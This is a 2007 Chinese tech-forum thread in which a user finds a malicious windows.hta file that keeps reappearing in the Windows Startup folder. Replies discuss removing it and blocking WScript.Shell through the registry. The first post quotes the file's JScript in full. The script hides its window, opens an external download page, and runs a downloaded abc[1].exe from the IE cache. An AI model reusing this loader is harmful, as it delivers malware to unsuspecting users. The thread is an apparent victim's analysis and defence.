windows.hta~~~~~[已解决]

iptton

C:\Documents and Settings\All Users\「开始」菜单\程序\启动
下一个文件： windows.hta


删了后重启又在了……
卡巴没有随系统启动

下面的网址路径，没有安杀软的不要轻易点，点了后果自负……

用记事本打开：

TG!     稈?蚕?  _?
        g 噎c?胂般  ?    

      
   
?幎雖?嶖  _?    
      
   
                         |  ?等骪??  Dw=     ?    ?"        I        ?幎雖?嶖  _?                          2          ' ?
 S U N N Y  ?               ?
??  
<html>
<body>
<script>
window.moveTo(4000,4000);
window.resizeTo(0,0);
var shell=new ActiveXObject("wscript.shell");
shell.Run("C:\\Progra~1\\Intern~1\\IEXPLORE.EXE http://www.if56.cn/lo/downmm.html",0,0);
function runmm(){
    var path=shell.SpecialFolders("MyDocuments");
    var savepath=path.substring(0,path.lastIndexOf("\\"));
    savepath+="\\Local Settings\\Temporary Internet Files\\Content.IE5\\";
    var sp=new ActiveXObject("shell.application");

    var Folders=sp.NameSpace(savepath);
    for(i=0;i<Folders.Items().Count;i++){
       var Folder=Folders.Items().Item(i).Path;
       Folder+="\\abc[1].exe]\\abc[1].exe";
       try{
           shell.Exec(Folder);
       }catch(e){};
    }

    window.close();
};
shell.Run("cmd.exe /c tree c:\\ /f",0,1);
runmm();
</script>
</body>
</html>

红色那段代码可以遍历文件夹元素……学到了……

注册表里没有 if56.cn  和 windows.hta 的项……


PS：之所以能够发现这个，并不是我常常去检查下有什么启动项，
而是每次关机前都把网络连接禁了(启动时这个做与不做，启动速度差很多……)

[ 本帖最后由 iptton 于 2007-6-11 13:48 编辑 ]

bluesmart

好长的script

subomaoming

你这个是不是会自动打开www.if56.cn这个网页阿 ，你修改下host,将那个网址删掉看看，
还有，全盘查毒，应该给下了不少木马
至于你那个卡巴，没有随系统打开，那么在开机后可以顺利运行吗？如果答案是否，多数是被映像劫持了，去注册表删除相应劫持项即可！

iptton

卡巴没自动启动是因为我没让它自动启动……
读下SCRIPT就知道是打开网页，并马上移到视野外，又马上把大小改为零……


刚刚删了所有IE临时文件，重启，现在那个文件不在了……

iptton

改什么host……
system32/drivers/etc/下那个文件？


跟这个有什么关系？？

[ 本帖最后由 iptton 于 2007-6-11 13:39 编辑 ]

iptton

很久以前就见过这个……
都没有照做


这次要改改了……

WScript.Shell可以调用系统内核运行DOS基本命令


可以通过修改注册表，将此组件改名，来防止此类木马的危害。


HKEY_CLASSES_ROOT\WScript.Shell\
及
HKEY_CLASSES_ROOT\WScript.Shell.1\
改名为其它的名字，如：改为WScript.Shell_ChangeName或WScript.Shell.1_ChangeName

happyeveryday

但是改了，会不会对其它的应用程序有影响？？？？